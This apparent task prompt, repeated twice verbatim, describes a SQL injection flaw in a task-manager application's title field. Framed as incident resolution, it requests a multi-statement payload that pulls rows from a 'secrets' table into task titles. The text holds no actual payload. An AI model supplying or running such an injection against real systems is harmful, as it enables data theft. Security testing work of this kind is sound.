A critical security incident has been identified in the task-manager application. Analysis shows that user-supplied input in task title fields is directly concatenated into SQL INSERT/UPDATE statements without sanitisation, allowing for multi-statement attacks. The application uses statements like 'INSERT INTO tasks (done, title) VALUES (false, '[USER_INPUT]')' where user input isn't properly parameterised.
The resolution requires a demonstration payload showing how an attacker could extract data from the 'secrets' table by injecting SQL that closes the original statement and appends additional SQL commands to read sensitive information into visible task titles.
A critical security incident has been identified in the task-manager application. Analysis shows that user-supplied input in task title fields is directly concatenated into SQL INSERT/UPDATE statements without sanitisation, allowing for multi-statement attacks. The application uses statements like 'INSERT INTO tasks (done, title) VALUES (false, '[USER_INPUT]')' where user input isn't properly parameterised.
The resolution requires a demonstration payload showing how an attacker could extract data from the 'secrets' table by injecting SQL that closes the original statement and appends additional SQL commands to read sensitive information into visible task titles.